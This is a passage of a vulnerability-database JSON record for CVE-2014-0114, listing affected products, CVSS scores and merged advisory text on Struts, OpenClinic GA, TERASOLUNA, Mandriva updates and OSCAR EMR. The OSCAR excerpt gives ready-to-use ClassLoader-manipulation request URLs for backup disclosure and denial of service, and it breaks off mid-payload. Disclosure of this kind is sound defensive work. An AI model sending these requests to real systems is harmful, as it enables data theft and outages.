"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "76000"
},
{
"_id": null,
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "security threat response manager 2012.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"_id": null,
"model": "global link manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-01"
},
{
"_id": null,
"model": "security threat response manager",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2013.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.01"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.21.0"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2.0-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3.1"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4-00"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0.0-00"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.00"
},
{
"_id": null,
"model": "sitescope",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "11.13"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.5.0"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.1"
},
{
"_id": null,
"model": "enterprise data quality",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.2"
},
{
"_id": null,
"model": "predictive insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.20.0"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2.0"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.30"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"_id": null,
"model": "insurance ifrs analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "178.0.6"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"_id": null,
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2.2"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-03"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-50-09"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10500"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "retail central office 12.0.9in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "77000"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "global link manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "websphere partner gateway express edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "global link manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-10"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2.145"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.010"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.2"
},
{
"_id": null,
"model": "raplication manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.13"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.1"
},
{
"_id": null,
"model": "infosphere mashuphub",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "vcenter server update",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "5.52"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.021"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.1"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-00(x64))"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1"
},
{
"_id": null,
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00"
},
{
"_id": null,
"model": "manager",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "111.7"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-01"
},
{
"_id": null,
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-02"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"_id": null,
"model": "big-ip edge gateway hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.3.0-00"
},
{
"_id": null,
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00(x64))"
},
{
"_id": null,
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "web interface for content management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.4"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-03"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.20"
},
{
"_id": null,
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-01"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"_id": null,
"model": "lotus quickr for websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-02"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.4"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:nttdata:terasoluna_server_framework_for_java_web",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
}
]
},
"credits": {
"_id": null,
"data": "Rene Gielen",
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 0.9
},
"cve": "CVE-2014-0114",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-0114",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2014-000056",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-006468",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-0114",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2020-006468",
"trust": 0.8,
"value": "Critical"
},
{
"author": "IPA",
"id": "JVNDB-2014-000056",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-581",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-0114",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"description": {
"_id": null,
"data": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485* Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484* Improper authentication (CWE-287) - CVE-2020-14494* Lack of certification (CWE-862) - CVE-2020-14491* Execution with unnecessary privileges (CWE-250) - CVE-2020-14493* Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488* Path traversal (CWE-22) - CVE-2020-14490* Inappropriate authorization process (CWE-285) - CVE-2020-14486* Cross-site scripting (CWE-79) - CVE-2020-14492* Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489* Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485* A remote attacker bypasses the system\u0027s account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484* In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494* The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491* In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493* The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488* Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490* By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486* Malicious code is executed on the user\u0027s browser because the user\u0027s input value is not properly validated. - CVE-2020-14492* Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489* A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, achievements\nmade possible by the creation and success of OSCAR EMRas ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. \n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\naLoginFiltera servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named \u0027oscarSecurityManager\u0027 is defineda, but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 